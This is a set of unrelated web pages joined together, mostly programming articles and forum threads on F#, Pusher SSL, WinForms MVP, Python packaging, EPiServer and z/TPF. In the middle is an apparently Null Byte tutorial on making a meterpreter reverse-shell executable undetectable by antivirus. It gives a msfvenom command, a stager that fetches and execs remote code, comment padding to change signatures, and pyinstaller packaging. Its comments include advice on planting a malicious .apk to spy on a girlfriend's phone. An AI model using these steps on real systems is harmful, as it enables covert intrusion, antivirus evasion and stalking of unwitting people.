      let rgb = readBigEndianShort br
      let r = (rgb >>> 11) * 255us / 31us
      let g = ((rgb >>> 5) &&& 63us) * 255us / 63us
      let b = (rgb &&& 31us) * 255us / 31us

      readPoints ((x,y,z,r,g,b) :: acc) (n-1) br

  // Function to extract the various point information
  // from a stream corresponding to a single point file
  let extractPoints br =

    // First information is the file version
    // (for now we support version 1.0 only)
    let majVer = readBigEndianShort br
    let minVer = readBigEndianShort br
    if (int)majVer <> 1 || (int)minVer <> 0 then
      []
    else
      // Clear some header bytes we don't care about
      let n = readCompressedInt 0 br
      for i in 0..(int)n-1 do
        let m = readCompressedInt 0 br
        for j in 0..(int)m-1 do
          readCompressedInt 0 br |> ignore
          readCompressedInt 0 br |> ignore

      // Find out the number of points in the file
      let npts = readCompressedInt 0 br

      // Read and return the points
      readPoints [] npts br

  // Recursive function to create a string from a list
  // of points. Our accumulator is a StringBuilder,
  // which is the most efficient way to collate a
  // string
  let rec pointsToString (acc : StringBuilder) pts =
    match pts with
    | [] -> acc.ToString()
    | (x:float32, y:float32, z:float32, r, g, b) :: t ->
      acc.AppendFormat(
        "{0},{1},{2},{3},{4},{5}\n",
        x.ToString(CultureInfo.InvariantCulture),
        y.ToString(CultureInfo.InvariantCulture),
        z.ToString(CultureInfo.InvariantCulture),
        r, g, b) |> ignore
      pointsToString acc t

  // Expose an event that's subscribable from C#/VB
  [<CLIEvent>]
  member x.JobCompleted = jobCompleted.Publish

  // Property to indicate that we're done
  member x.IsComplete = completed

  // Property to find out about any failures
  member x.Failures = jobsFailed

  // Property to return the results
  member x.TotalPoints = totalPoints

  // Our main function to download and process the point
  // cloud(s) associated with a particular Photosynth
  member x.ProcessPointCloud baseUrl dims txtPath =

    // A local function to add the URL prefix to each file
    let pathToFile file = baseUrl + file

    // Generate our list of files from the list of dimensions
    // of the various point clouds
    // Each entry in dims corresponds to the number of files:
    // dims[0] = 5 means "points_0_0.bin" .. "points_0_4.bin"
    // dims[6] = 3 means "points_6_0.bin" .. "points_6_2.bin"
    let files =
      Array.mapi
        (fun i d ->
          Array.map
            (fun j -> sprintf "%d_%d.bin" i j)
            [| 0..d-1 |])
        dims
      |> Array.concat
      |> List.ofArray

    // Set/reset mutable state
    totalJobs <- files.Length
    jobsComplete <- 0

    // Open the local, temporary text file to hold our points
    let t = new FileInfo(txtPath)
    let sw = t.Create()

    // An agent to store our points in the file...
    // Loops and receives messages, so that we ensure we don't
    // have a conflict of simultaneous writes
    let fileAgent =
      Agent.Start(fun inbox ->
        async {
          while true do
            let! (msg : string) = inbox.Receive()
            do! sw.AsyncWrite(Encoding.ASCII.GetBytes(msg))
        })

    // Our basic asynchronous task to process a file, returning
    // the number of points
    let processFile (file:string) =
      async {
        let! stream = httpAsync file
        use reader = new BinaryReader(stream)
        let pts = extractPoints reader
        pointsToString (new StringBuilder()) pts |> fileAgent.Post
        return file, pts.Length
      }

    // Our jobs are a set of tasks, one for each file
    let jobs =
      [for file in files -> pathToFile file |> processFile]

    // Create our AsyncWorker for our jobs
    let worker = new AsyncWorker<_>(jobs)

    // Raise an event when each file is processed and update
    // our internal state
    worker.JobCompleted.Add(fun (jobNumber, (url, ptnum)) ->
      let file = url.Substring(url.LastIndexOf('/')+1)
      jobsComplete <- jobsComplete + 1
      syncContext.RaiseEvent jobCompleted (file, ptnum)

      // If the last job, close our temporary file
      if jobsComplete = totalJobs then
        sw.Close()
        sw.Dispose()
    )

    // Raise an event when an error occurs
    worker.Error.Add(fun ex ->
      jobsComplete <- jobsComplete + 1
      jobsFailed <- jobsFailed + 1
      syncContext.RaiseEvent jobCompleted ("Failed", 0)
    )

    // Raise an event on cancellation
    worker.Canceled.Add(fun ex ->
      worker.CancelAsync()
      jobsComplete <- totalJobs
      jobsFailed <- totalJobs
    )

    // Once we're all done, set the results as state to be
    // accessed by our calling routine
    worker.AllCompleted.Add(fun results ->
      totalPoints <- Array.sumBy snd results
      completed <- true)

    // Now start the work
    worker.Start()

This implementation makes use of the AsyncWorker<> class: a standard design pattern implemented by Don Syme to report progress during a series of asynchronous tasks. We have events – raised on the UI thread, which means we can call back into AutoCAD safely – for when tasks complete, fail or get cancelled.

Let's take a closer look at the core function in this implementation, the one that processes a single file:

1 let processFile (file:string) =
2   async {
3     let! stream = httpAsync file
4     use reader = new BinaryReader(stream)
5     let pts = extractPoints reader
6     pointsToString (new StringBuilder()) pts |> fileAgent.Post
7     return file, pts.Length
8   }

The first line names the function and declares it to take a string argument. The second line says the whole operation is to be considered an asynchronous task, which means it can be executed in a non-blocking way. The third line is the only actual call that is made asynchronously, as denoted by the "!", which tells the F# compiler to call the function but only continue with the assignment and the code following it once the results arrive. The rest of the code actually just takes the downloaded file and processes its contents by using a BinaryReader and extracting the various points in a very linear fashion. There was really no advantage to be had in attempting to make the processing asynchronous – the real benefit is derived from performing the download asynchronously rather than the processing.

One important point about the way this code works: it's all very well requesting data which then gets processed in a random order as it arrives back, but we do need to coordinate placing that data into our text file (which, as you saw in the process diagram, will then get processed into a LAS file before that, in turn, gets indexed into a PCG and attached inside an AutoCAD drawing). The points can come in any order – we're not fussy about the ordering – but they do all need to make it in there. The way I've approached that is to use agent-based message passing (as described in more detail in this blog post). This sets up a central mailbox for requests to write to our text file: as the messages get processed, the points get added to the file.

What's important to note about these "tasks": we have spent all our time saying what needs to happen – not when.
The timing of the execution of these tasks is handled completely by the F# runtime and the .NET Framework – we really don't need to care about how and when things happen.

Just to make sure there wasn't any inherent benefit from using F# rather than C#, I also implemented an additional "F# synchronous" mode. The code is provided in the project associated with this class. What's potentially of more interest is the approach I've used to switch between the various implementations: I've used a capability in AutoCAD 2011 allowing system variables to be added via the Registry. Here's the .reg file I've used to do this:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Autodesk\AutoCAD\R18.1\ACAD-9001:409\Variables\BROWSEPSSYNC]
"StorageType"=dword:00000002
"LowerBound"=dword:00000000
"UpperBound"=dword:00000002
"PrimaryType"=dword:0000138b
@="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Autodesk\AutoCAD\R18.1\ACAD-9001:409\Variables\BROWSEPSLOG]
"StorageType"=dword:00000002
"LowerBound"=dword:00000000
"UpperBound"=dword:00000001
"PrimaryType"=dword:0000138b
@="0"

This adds two sysvars to AutoCAD:

- BROWSEPSSYNC – an integer between 0 and 2, stored per-user - Used to indicate the synchrony mode: 0 = C# synchronous, 1 = F# synchronous, 2 = F# asynchronous
- BROWSEPSLOG – an integer between 0 and 1, stored per-user - Used to indicate whether to save the performance information in a log file

We're then able to get the values of these system variables using (for instance) Application.GetSystemVariable("BROWSEPSSYNC") in our code. The IMPORTPS implementation now uses the appropriate user-selected synchrony mode, and – optionally – stores the performance data in "Documents\Photosynth Point Clouds\log.txt".
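Before looking at the timings, it's worth noting that the two bit-level helpers shared by all three implementations – the 7-bit "compressed int" (which terminates when a byte has its high bit set) and the 5-6-5 colour unpacking – are easy to sanity-check in isolation. Here's a rough Python rendition of the same logic; the function names are mine, not the plugin's:

```python
def read_compressed_int(data, pos=0):
    """Big-endian 7-bit packed int; a byte >= 128 ends the value.

    Returns the decoded value and the position after it, mirroring
    the ReadCompressedInt / readCompressedInt helpers above.
    """
    i = 0
    while True:
        b = data[pos]
        pos += 1
        i = (i << 7) | (b & 127)
        if b >= 128:            # high bit set -> last byte of the value
            return i, pos

def unpack_rgb565(rgb):
    """Expand a 16-bit 5-6-5 colour to three 8-bit RGB channels."""
    r = (rgb >> 11) * 255 // 31
    g = ((rgb >> 5) & 63) * 255 // 63
    b = (rgb & 31) * 255 // 31
    return r, g, b

# Two payload bytes: 0x01 contributes 7 bits, 0x85 terminates,
# giving (1 << 7) | 5 = 133 and a new read position of 2.
print(read_compressed_int(bytes([0x01, 0x85])))  # (133, 2)
print(unpack_rgb565(0xFFFF))                     # (255, 255, 255)
```

This kind of standalone check is handy for verifying the file-format logic without having to run anything inside AutoCAD.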
To put the code through its paces, I modified the mode before importing each of a number of my favourite synths, in increasing order of size:

Vietnam Memorial Statue using C# synchronous: 46293 points from 10 files in 00:00:06.7260000
Vietnam Memorial Statue using F# synchronous: 46293 points from 10 files in 00:00:02.3120000
Vietnam Memorial Statue using F# asynchronous: 46293 points from 10 files in 00:00:01.5560000

National Geographic - Sphinx using C# synchronous: 102219 points from 21 files in 00:00:17.3470000
National Geographic - Sphinx using F# synchronous: 102219 points from 21 files in 00:00:16.5290000
National Geographic - Sphinx using F# asynchronous: 102219 points from 21 files in 00:00:04.2920000

L'epee de la Tene using C# synchronous: 405998 points from 82 files in 00:00:57.8160000
L'epee de la Tene using F# synchronous: 405998 points from 82 files in 00:00:54.2560000
L'epee de la Tene using F# asynchronous: 405998 points from 82 files in 00:00:08.3740000

Another Tres Yonis Synth using C# synchronous: 1141257 points from 229 files in 00:03:56.0490000
Another Tres Yonis Synth using F# synchronous: 1141257 points from 229 files in 00:04:20.4900000
Another Tres Yonis Synth using F# asynchronous: 1141257 points from 229 files in 00:00:21.3790000

Just to be clear: I did change the order of the execution – to make sure "C# synchronous" didn't have the disadvantage of pulling down data that was cached for the other modes – but I've reordered them here for ease of reading (it didn't change anything at all in terms of results). Here's the data in graphical form:

We can see that the difference in performance between C# and F# when working synchronously is modest: F# seems a bit quicker overall, although C# was a bit quicker on the largest synth. But both were blown away by F# asynchronous: at worst F# async was 4 times faster, and at best it was 12 times faster!
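The concurrency shape behind those numbers is portable beyond F#. Below is a rough Python asyncio analogue (entirely my own illustration – the names files_from_dims, process_file and the simulated 5,000-point payloads are not the plugin's): a list of per-file jobs is generated from a dims array just as ProcessPointCloud() does, all "downloads" run concurrently, and a single writer coroutine plays the role of the F# mailbox agent, serialising the file writes while accepting results in any order:

```python
import asyncio

def files_from_dims(dims):
    # dims = [5, 3, 1] -> points_0_0.bin .. points_0_4.bin,
    # points_1_0.bin .. points_1_2.bin, points_2_0.bin
    # (the service stores 5,000 points per file)
    return [f"points_{i}_{j}.bin"
            for i, d in enumerate(dims) for j in range(d)]

async def writer(queue, out):
    # Single consumer: like the F# agent, it serialises writes
    while True:
        msg = await queue.get()
        if msg is None:          # sentinel: no more results coming
            break
        out.append(msg)

async def process_file(name, queue):
    await asyncio.sleep(0)       # stand-in for the async download
    await queue.put(f"{name} processed")
    return name, 5000            # pretend each file held 5,000 points

async def main(dims):
    queue = asyncio.Queue()
    out = []
    w = asyncio.create_task(writer(queue, out))
    # Describe all the jobs, then let the runtime schedule them
    results = await asyncio.gather(
        *(process_file(f, queue) for f in files_from_dims(dims)))
    await queue.put(None)
    await w
    return sum(n for _, n in results), out

total, lines = asyncio.run(main([5, 3, 1]))
print(total)       # 45000
print(len(lines))  # 9
```

As in the F# version, the code only says what needs to happen; when each download completes, and in what order the results land, is left to the event loop.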
http://through-the-interface.typepad.com/through_the_interface/2010/11/au-2010-handout-integrate-f-into-your-c-or-vbnet-application-for-an-8x-performance-boost.html
SSL Everywhere!

Secured connections and privacy are a must, particularly if you handle sensitive or confidential customer data. What's more, a secured connection improves the reliability of persistent connections with proxies and firewalls, and can in some situations result in speed improvements. So, we've made SSL available everywhere. It's now available on all plans, including Bootstrap and the free Sandbox plan. This also means that no matter the plan you're on, you get the same level of functionality from Pusher.

Si Señor! I've used Pusher with SSL for years. What's the difference?

True. From the very beginning we've offered SSL access to the WebSocket API using WSS, and HTTPS has been available on our HTTP endpoints. In fact, over 70% of client connections (WebSocket and HTTP fallback) use the SSL protocol. The difference is that we're now moving towards making SSL the default for our libraries so that everybody automatically gets the benefits. Also, all of our assets are now served over HTTPS for your added security. The website and blog have just been moved to HTTPS to catch up with the application dashboard, JavaScript library CDN, support site and status page, which have long been on HTTPS.

That's great! Will prices change?

Nope. We'll keep things sweet and simple: SSL will be included by default on all plans at no extra cost – including the free Sandbox plan.

How do I take advantage of SSL with Pusher?

The Android (Java) and iOS (Objective-C) libraries have already been updated to do this. But, for the moment, you'll need to configure some of the other Pusher libraries to use SSL. For example, the Pusher JavaScript WebSocket library:

<script src="//js.pusher.com/2.2/pusher.min.js"></script>
<script>
  var pusher = new Pusher( 'APP_KEY', { encrypted: true } );
</script>

And the HTTP API libraries.
A few examples include:

Ruby

gem 'pusher'

Pusher.app_id = 'APP_ID'
Pusher.key = 'APP_KEY'
Pusher.secret = 'APP_SECRET'
Pusher.encrypted = true

This example uses the pusher-http-ruby library.

PHP

require 'vendor/autoload.php';

$pusher = new Pusher( 'APP_KEY', 'APP_SECRET', 'APP_ID', array( 'encrypted' => true ) );

This example uses the Pusher HTTP PHP library.

Python

from pusher import Config, Pusher

config = Config(app_id=u'4', key=u'key', secret=u'secret', ssl=True)
pusher = Pusher(config)

This example uses the Pusher HTTP Python library.

Node

var Pusher = require( 'pusher' );

var config = {
  appId: 'APP_ID',
  key: 'APP_KEY',
  secret: 'APP_SECRET',
  encrypted: true
};
var pusher = new Pusher( config );

This example uses the Pusher HTTP Node library.

If the library you use is not listed above, you should be able to find it via the libraries page. From there, each library README should explain how to use SSL. If it doesn't, please either raise an issue against the repo or get in touch.
https://blog.pusher.com/ssl-everywhere/
The terms "Model View Controller" (MVC) and "Model View Presenter" (MVP) describe patterns that have been in use for some time in other technology areas but have recently come to the fore in the C# world. Model View Presenter is a derivation of the Model View Controller pattern. With modern IDEs such as Visual Studio inserting event handling into what we refer to as the view, it makes sense to leave the handlers there rather than trying to implement them on a controller. I struggled to find a simple MVP example on the web that was geared towards C# WinForms, and after reading Bill McCafferty's excellent article on MVP within ASP.NET, I decided to throw my hat into the ring. I'm going to concentrate on the code. For background on MVP, I suggest you try this link:

The Model View Presenter pattern is designed to abstract the display of data away from the data and its associated actions (e.g., saving state). This, in theory, should make testing easier and more relevant, and remove the tight coupling typically found between data and forms within the Windows environment.

The View is a user control that inherits from System.Windows.Forms. Its role in life is to display whatever data we are interested in. It contains no logic other than raising an event should the data change, plus any processing particular to the View itself, such as closing. It doesn't care if anybody is listening to the event; it simply raises the event and has fulfilled its purpose. The View implements an interface that exposes the fields and events that the Presenter needs to know about.

public class UserView : Form, IUserView

The Model is a representation of the data being manipulated. In my simple example, this is a user object. The Model should implement an interface (IUserModel) that exposes the fields that the Presenter will update when they change in the View.

public class UserModel : IUserModel

The Presenter marries the View to the Model.
When first called, the Presenter updates all the properties of the View to correspond to the Model. Furthermore, it binds the View's events to methods on itself. Typically, the Presenter will update the Model based on changes in the View. Once a user has finished making changes in the View, the Model should be in sync and will be saved down correctly. The Presenter does not require an interface.

public UserPresenter(IUserModel model, IUserView view)
{
    this._model = model;
    this._view = view;
    this.SetViewPropertiesFromModel();
    this.WireUpViewEvents();
}

In my example, I use Reflection to iterate through the properties of the View / Model and update the corresponding field. Reflection is slow, but I haven't experienced any tangible slowdown in any of my Windows apps yet - it would be easy to pass through a reference to the specific property being updated if speed starts to become an issue.

IUserModel model = new UserModel();
IUserView view = new UserView();
new UserPresenter(model, view);
view.Show();

The code to get the ball rolling is simplicity itself, as shown above.

The example with this article includes some tests. Because our Presenter expects interfaces as opposed to concrete objects, it allows us to perform dependency injection with stubs and mocks, should we choose.

[Test]
public void DoesViewCorrespondToModel()
{
    StubView stub = new StubView();
    new UserPresenter(this._mock, stub);
    ...
}

In my tests, I have a StubView that implements the IUserView interface. I then instantiate a mock object representing the Model and perform testing on that. My tests check that the View shows what's in the Model and that the Model is updated when the View changes. You would, of course, include more tests in a real-world project.
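As a rough sketch of the Reflection-based sync described above (the method name SetViewPropertiesFromModel is from the article, but the body below is my assumption of how such a helper might look, not the article's actual code):

// Hypothetical sketch of the Presenter's property-sync helper.
// Assumes the View and Model expose identically named properties
// through their interfaces, as the article describes.
private void SetViewPropertiesFromModel()
{
    foreach (PropertyInfo modelProp in typeof(IUserModel).GetProperties())
    {
        PropertyInfo viewProp = typeof(IUserView).GetProperty(modelProp.Name);
        if (viewProp != null && viewProp.CanWrite)
        {
            viewProp.SetValue(_view, modelProp.GetValue(_model, null), null);
        }
    }
}

A mirror-image SetModelPropertiesFromView would swap the roles of the two interfaces.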
My stub implements event mocking, e.g.:

public void FireDataChanged()
{
    if (this.DataChanged != null)
    {
        this.DataChanged(null, EventArgs.Empty);
    }
}

From within my test, I simply call FireDataChanged to recreate what would happen when a user changes any of the data in my View from within the application.

You may be wondering why I go to the trouble of implementing code in the Presenter to update the Model / View when Microsoft kindly provides us with databinding technology to bind data to Windows controls. The great thing about databinding is that it removes the need to write code in every Presenter to take care of the state, thus speeding the development cycle. The problem with databinding is that it breaks our encapsulation by tightly coupling the View to the data. Also, it cannot be tested from within an NUnit environment. Without databinding, however, one still needs to write laborious code within the Presenter to keep the Model in sync with the View. I hope that the Reflection-based code example I have provided will ease this pain. Simply expose the data you require in the View and Model interfaces, and it should all be taken care of for you.

I am not a pattern zealot; you may find that, given time constraints and the nature of a task you need to perform, a tightly bound view using databinding is the best option - however, I would encourage the abstraction of logic from presentation and the use of tests wherever possible.

It became apparent in the development of this article that a lot of property definitions are shared between the IView and IModel interfaces. In fact, every editable data property exposed on the Model needs to be implemented on the View; you may, therefore, like to consider implementing an additional interface called ICommonFields that is implemented by both IModel and IView.
The benefit of this approach is that one only needs to add a new property to a single interface for the compiler to insist on its implementation in both the Model and the View.

Using MVP within WinForms is a learning curve, and I am keen to hear constructive criticism from anyone who thinks the example I have provided can be improved. By sharing knowledge, we all gain. The MVP pattern has been developed by many coders over a long period of time. Martin Fowler presents that knowledge in a nice, concise form on his website (link at the top of the article). Thanks to Bill McCafferty for investing so much time in the article he wrote about MVP in ASP.NET (link at the top of the article), which inspired me to submit a WinForms-focused article.

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL).
http://www.codeproject.com/Articles/14660/WinForms-Model-View-Presenter?msg=2687197
Pages: 1

hello guys, i have a very annoying problem with libpypac. python uses dynamic binary loading, and that means that if i should install python with libpypac i'll be in trouble. scenario: i run "lazy-pac-cli -S python" and the steps taken by libpypac are:

1. Download the new python version
2. Uninstall the old version
3. Install the new version

you see, when step three comes there is missing stuff that hasn't been used before. i've thought of making a dummy package or something.

arch + gentoo + initng + python = enlisy

missing stuff? You might indeed try loading the binaries you need first before doing the uninstall, so they are resident in memory before step 2. The other thing you could do is, upon finding out you are going to be updating python, make a temp dir copy of the binaries you need, load them there, then perform the install, then remove the copies and load the new ones.

"Be conservative in what you send; be liberal in what you accept." -- Postel's Law

I always thought that python loaded up everything it needed when you imported things, so as long as enough to get libpypac going is in ram it should work... Why don't you try it and see what happens? And if it breaks, call pacman in.

@cactus it should be "stuff missing" i guess. i want to do it as your first suggestion but i can't figure out how to do it. a temporary dir sounds like an ugly workaround even if it might work. how does the real pacman do it with glibc? that should be like the same problem. @iphitus i've thought so too but look here what happens:

[root@UFU abs]# ./lazy-pac-cli -S python
The package is already installed in the system.
The following packages will be installed with python:
python-2.4.1-1
Total compressed size: 9.9 MB
Proceed with the installation? [y/n] y
Downloading python ...
...
checking md5sum ... done.
Installing python ...
Traceback (most recent call last):
  File "./lazy-pac-cli", line 22, in ?
    main.install_control(sys.argv)
  File "/home/xerxes2/programs/abs/main.py", line 195, in install_control
    install_binary(dep_list, None)
  File "/home/xerxes2/programs/abs/main.py", line 137, in install_binary
    retcode = libpypac.install(package, i, depends_list, noupgrade_list, reason, oldver, None)
  File "/home/xerxes2/programs/abs/libpypac.py", line 584, in install
    tar = tarfile.open(cache_dir + package + ".pkg.tar.gz", "r:gz")
  File "/usr/lib/python2.4/tarfile.py", line 896, in open
  File "/usr/lib/python2.4/tarfile.py", line 948, in gzopen
tarfile.CompressionError: gzip module is not available

hmm, it looks like some shared binary is missing, the "gzip module".

try importing 'gzip' beforehand so it's preloaded?

yes, i've found the problem now. it's the "tarfile" module that dynamically loads the other python modules it uses. taken from tarfile.py:

def gzopen(cls, name, mode="r", fileobj=None, compresslevel=9):
    """Open gzip compressed tar archive name for reading or writing.
       Appending is not allowed.
    """
    if len(mode) > 1 or mode not in "rw":
        raise ValueError, "mode must be 'r' or 'w'"
    try:
        import gzip
        gzip.GzipFile
    except (ImportError, AttributeError):
        raise CompressionError, "gzip module is not available"

how the hell should i solve this?

try importing 'gzip' beforehand so it's preloaded?

yiippppiiiiiiieee!!!! thanks aussie! that worked. a simple "import gzip" at the top of libpypac solved it. 8)

edit:

[root@UFU abs]# ./lazy-pac-cli -S python
The package is already installed in the system.
The following packages will be installed with python:
python-2.4.1-1
Total compressed size: 9.9 MB
Proceed with the installation? [y/n] y
Using package for python from cache ...
...
checking md5sum ... done.
Installing python ...
... done.
The package is installed, enjoy!

Pages: 1
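The fix in the thread — importing gzip up front so it is already cached before the files on disk are swapped out — can be sketched like this (a standalone demo of the caching behaviour; the lazy-pac-cli/libpypac names are from the thread but not used here):

```python
# Preload the compression module that tarfile imports lazily, so it is
# already in sys.modules before the python package files on disk get
# uninstalled/replaced mid-upgrade.
import sys
import io
import gzip      # the fix from the thread: force the lazy import early
import tarfile

assert 'gzip' in sys.modules  # cached: tarfile's own "import gzip" is now a no-op lookup

# Build a tiny .tar.gz in memory and reopen it, mimicking libpypac
# opening a package archive with mode "r:gz".
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode='w:gz') as tar:
    data = b'hello package'
    info = tarfile.TarInfo(name='PKGINFO')
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))

buf.seek(0)
with tarfile.open(fileobj=buf, mode='r:gz') as tar:
    member = tar.extractfile('PKGINFO').read()

print(member.decode())  # -> hello package
```

Because Python caches modules in sys.modules on first import, the later lazy `import gzip` inside tarfile succeeds even if the module's files on disk have been removed in the meantime.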
https://bbs.archlinux.org/viewtopic.php?pid=96758
Creating a Completely Undetectable Executable in Under 15 Minutes!

Hello everyone, this is my first post so play nice with me. We are going to create an undetectable (meterpreter/shell/vnc) executable in under 15 minutes. Henceforth, what I mean by undetectable is that it is detected by 0 antivirus engines. Trust me, I've tried and it's possible. But you ask, how is this possible? Let me explain how AVs detect threats in quick and simple language. When you scan an .exe or any other file, the AV doesn't scan the actual code for bad stuff. It takes the file's signature and searches its database to see if it's a threat or not. Simple. Typically, many new executables aren't detected until it's too late. So, how do we change the signature? Let's do this!

Note: All tools used were run on a fresh Kali system, meaning that all tools are already preinstalled.

Step 1: Boot Up Kali and Create a Basic Executable

First we need to create a basic script from msfvenom to make the executable. Run the command:

msfvenom -p python/meterpreter/reverse_tcp LHOST=ANYIP LPORT=ANYPORT R > anyname.py

Here is mine.

Step 2: Decoding and Editing the Source Code

Take the .py file you've created and open it with any text editor. It should look like this. Now we need to decode it with a Base64 decoder. Take the highlighted pink part and copy it. Paste it into any decoder online (I used this website), click on decode, and look at that! We've decoded the source code. Naturally this code is public knowledge and all AVs know about it. So let's change the code a bit. Copy the decoded source code into your editor, make some spaces between the code, and add comments (# anything can go here) - as many as you can. The more, the better. Here's what I did.
#True
import socket,struct
#DANK
s=socket.socket(2,socket.SOCK_STREAM)
#WOW
s.connect(('192.168.0.1',3333))
#YOU HAD ONE JOB
l=struct.unpack('>I',s.recv(4))[0]
#NICE AV
d=s.recv(l)
#LOL NEVER MIND
while len(d)<l:
    d+=s.recv(l-len(d))
#WHOA
exec(d,{'s':s})

As you can see, there are some random messages placed in between the code. The # means comment, so it doesn't affect the code and python will just skip it; comments are for human proofreaders to see what's going on. Once that's finished, copy that code and paste it into the encoder. That's a lot of symbols. Copy the output and paste it into the pink part of the python script you opened earlier. As you can see, it dramatically increased the size of the code. Save it now.

Step 3: Convert It into an Executable

Now, unless you are attacking a Windows-based client, there is no need for this. Linux has built-in python support (at least to some extent). Mac has built-in python support. Windows doesn't, and the average consumer doesn't install python on their computer. So what do we do? Make it into an .exe executable. Run the command:

pyinstaller 'Your .py file here'

That's it! Wait for it to finish. Once it's finished, it will place the result in a specific directory - usually /root/dist/nameofyourfile/.

Step 4: Testing the Executable Against the AV

Naturally this isn't a good idea, because many AVs use VirusTotal to see new viruses. But a computer can never outsmart an always-changing virus. So take your .exe file and scan it! As you can see, we have a 0/54 detection ratio, meaning no one found it! This has many uses; the scenarios are endless. GL, HF!

17 Responses

Nice tutorial. I'll be checking it out tonight. Thanks.

I'm having an issue with it. When I try to run it on Windows 7 64-bit, I get an error message of "The version of this file is not compatible with the version of Windows..."
I'm guessing that it's because it's a 32-bit exe on a 64-bit OS, but shouldn't pyinstaller make it compatible? It still won't work, even if I do not change anything in the source code. Any ideas on getting it to work?

Hmm. Okay. It's a 64-bit OS, so it should be able to work. There are other python-to-exe programs; try using py2exe.

i got the same issue. how did u manage it?

Haven't figured it out yet. I pretty much gave up. I'd rather work with Shellter.

i just learned about shellter but i am afraid that it will get caught by AV soon, like veil-evasion. i used to use aes encryption; now antiviruses detect it. btw i have a question: shellter doesn't seem to start with full permission. even though i am root, in each step it says access denied rmem_error. i am using kali.

Excellent.

Nice tutorial, it's working well, now I know an easy way to make my files FUD!

Yeah, I'm thinking about making a tool like veil-evasion. How's that sound?

This is a great tutorial! Why don't AVs scan the actual code?

That would be impractical, slow and almost impossible. Most executables are obfuscated to stop people copying and pasting them. AVs don't have a human brain, meaning that they can't read code and say, 'Wait, the code looks really sketchy. I'm removing it.' But where AVs shine is the removal process. Once the AV finds it, you're probably dead meat. I've had scenarios where Malwarebytes caught me, but I killed it just in time. Anyway, most users don't need an antivirus; just don't install sketchy programs.

It's not entirely true that AVs don't scan the code. Signature analysis does static code analysis using code patterns extracted from previously analyzed malicious files. If a specific code pattern is found within a file, the AV will start flagging it, and it may potentially be seen as suspicious. If enough flags are raised, the file in question will be labelled as malicious, depending on the level of sensitivity set in the AV.
So in a sense, you could say that an AV knows whether a file is suspicious or not.

P.S. Is your file supposed to be a PE file? It's seen as an ELF64 on the VirusTotal scan.

Personally, I would disagree with your last statement. Drive-by download malware attacks are increasing. They infect through vulnerabilities. But yeah, the majority of infections are user-installed.

It doesn't matter. Drive-by vulnerabilities are added into AV databases slowly or not at all. Many AVs don't even fix or monitor vulnerabilities; that relies on the user downloading OS security updates. Users on Windows 10 are naturally protected against these, but anyone that uses anything else is affected.

Can you please help me install keylogger remotely on my girlfriend's phone??

Meterpreter for Android doesn't have a built-in keylogger. However, you may create a malicious .apk (if Android) to piggyback and install a more capable spying program. IMO, keylogging isn't really all that useful; I personally use it to gain passwords if they are text-based. Otherwise you are just flooding yourself with every letter she types.

That's all she wrote.
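The signature-matching model debated in the comments above can be sketched in a few lines of Python (a deliberately naive, hash-based illustration of my own; real AV engines also use code patterns and heuristics, as one commenter notes):

```python
# Naive signature-based "scanner": hash the file bytes and look the
# digest up in a database of known-bad signatures. Any change to the
# file -- even an added comment -- produces a different digest, which
# is why trivial edits can defeat this kind of detection.
import hashlib

KNOWN_BAD = {
    # hypothetical signature database (hex SHA-256 digests)
    hashlib.sha256(b"malicious payload v1").hexdigest(),
}

def is_flagged(file_bytes: bytes) -> bool:
    return hashlib.sha256(file_bytes).hexdigest() in KNOWN_BAD

print(is_flagged(b"malicious payload v1"))    # -> True
print(is_flagged(b"malicious payload v1 #"))  # -> False: one byte changed
```

This is also why modern engines moved beyond whole-file hashes to partial signatures and behavioural analysis.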
https://null-byte.wonderhowto.com/forum/creating-completely-undetectable-executable-under-15-minutes-0175114/
Hi Richly,

I don't think a stack trace would be of much help, as nothing in it was from the EPiServer namespaces. As for reproducing the behaviour, I just set a breakpoint in the Index action in one of the page controllers and then inspected the value of RouteData.DataTokens["node"]. On a normal request the type of that object would be PageReference. Btw, the behaviour was also in Update 40 (I noticed it there first).

Hi,

When in edit mode and publishing a page, on the following request for the page the "node" object in the route data dictionary is of type ContentReference and not PageReference. The type is PageReference again if the page is then selected in the page tree. Is this behaviour by design or a (known) bug? I was able to reproduce it with Alloy on update 50 (latest as of writing) of the NuGet packages.

Cheers,
Per Atle
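The inspection described above might look like the following C# sketch in a page controller. This is my own illustration, not code from the thread; the defensive casts rely on the fact that EPiServer's PageReference derives from ContentReference:

// Hypothetical snippet inside a page controller's Index action:
// inspect the "node" route token, which may arrive as a plain
// ContentReference on the first request after a republish.
var node = RouteData.DataTokens["node"];

var pageRef = node as PageReference;       // null on the first request after publish
var contentRef = node as ContentReference; // works in both cases, since
                                           // PageReference derives from ContentReference

Code that hard-casts the token to PageReference would throw on that first request, which is one way this behaviour can surface as a bug.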
https://world.optimizely.com/forum/developer-forum/CMS/Thread-Container/2015/1/node-object-is-contentreference-on-first-request-after-republish-of-page--bug/
For those accustomed to programming with the z/OS C/C++ compiler for the TPF 4.1 system, the application landscape might seem identical in the z/TPF system. It is not. The performance guidelines you might have used in the past changed a little. This article explains these changes as applicable to gcc and g++.

In the z/TPF system, everything is implemented as a shared object library; even traditional TPF assembler segments are members of a z/TPF-unique shared object type called a BAL shared object (BSO). There are no longer distinctions between DLL, DLM, or LLM library types. A shared object library must have at least one member and can consist of any number of members as needed to suit your design and implementation requirements. Any shared object can have only one entry point that is callable by an ENTxC service; but it may have multiple external entry points that are callable by external references. These types of entry points are resolved by the linkage editor and by the z/TPF system on a dynamic basis, invoking the system's enter/back service. Calls between members of the same shared object library are resolved without enter/back intervention. This linkage method is much faster than enter/back because the system does not have to participate.

There is no longer an entity called "writeable static storage", as there was in TPF 4.1. In the z/TPF system, writable data pages (note the terminology change from "writeable static") do not cause copy activity unless you write to them. The pages are mapped to the current ECB virtual memory (EVM) as read-only shared pages and handled with copy-on-write processing in your EVM. The first time any copy-on-write page is written to (even for just one byte), the entire page is copied to a private page that is mapped to your EVM; the code uses this private page instead of the read-only copy. This operation is triggered by a hardware exception called a page fault, which also has performance costs associated with it.
